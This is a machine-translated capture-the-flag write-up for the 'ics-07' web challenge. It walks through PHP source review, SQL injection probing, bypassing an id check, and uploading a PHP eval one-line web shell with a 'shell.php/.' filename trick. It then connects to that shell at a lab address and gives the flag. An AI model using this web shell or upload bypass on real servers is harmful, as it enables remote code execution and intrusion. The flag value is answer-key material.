Two 、ics-07

 

How to solve the problem ：

1、php Source code analysis , File upload vulnerability , In a word, Trojans

The process ：

robots.txt Nothing there?

 

Make yourself at home , Only this cloud platform management center can enter

Later, the transmission of parameters was also carried out

Determine whether there is character injection

Have added a single / One double quotation mark

There is no wrong report

Determine whether there is digital injection

and 1=1

and 1=2

It is found that the equal sign is encoded

One more view-source Button

After clicking, the source code comes out

 

---

Analyze the source code ：

Code 1：

isset() function ： Checks whether the variable is set and not NULL

show_source() function ： Syntax highlighting of files

header() function ： Send the original... To the client HTTP Headlines

 page The pass parameter cannot be empty （ If it's empty die）

page The transmission parameter cannot have index.php, Can only contain flag.php

---

Code 2：

preg_match function ： Perform a regular expression match

chdir() function ： Change the current directory , New catalogue needs to be specified

fopen() function ： Open a file or URL（ With permissions ）

fwrite () function ： Write string to file , Successfully returns the number of characters written , Otherwise return to FALSE

fclose() function ： Close file

  The process is ：

1、 First introduced

2、 Regular filtering

3、 Change the directory

4、 Open file

5、 write file

6、 Close file

（ This is a file upload vulnerability , Upload a word of Trojan , Or picture horse ）

And the upload path is /uploaded/backup/

---

Code 3：

floatval()： Returns the floating-point value of a variable

substr()： Intercept , Here is interception id I finally thought Must be 9

mysql_real_escape_string() ： escape SQL Special characters in strings used in statements

mysql_query() ： To perform a MySQL Inquire about

mysql_fetch_object() ： From result set （ Recordset ） Get a row as an object

If the input is correct , Returns the id and user（ That is admin）

id： Floating point value is not 1, And the last one is 9, And it's a string （ This is especially much ）

According to the previous analysis ：page=flag.php

  get

id=1

name=admin

---

Ideas ：

The most important thing here is to achieve $_SESSION['admin'] = True

Then you can upload files （ Upload a word of Trojan ）

Then ant sword （ Ice scorpion , kitchen knife ） Connect

find flag

---

Find login and get id,name 了 , But it didn't jump to upload page

（ It may not show ）

Try POST Upload a word of Trojan

Pass code 2 Parameters passed in , Know is to use con and file

payload：

con=<?php eval($_POST['1']);?>&file=shell.php/.

---

 

Connect again （ Code 2 Know how to upload to /uploaded/backup/ Next ）

61.147.171.105:57480/uploaded/backup/shell.php/

  It's coming in

  stay html Find flag.php

 

 cyberpeace{d2f720b48b37fca33797773be4a3c755}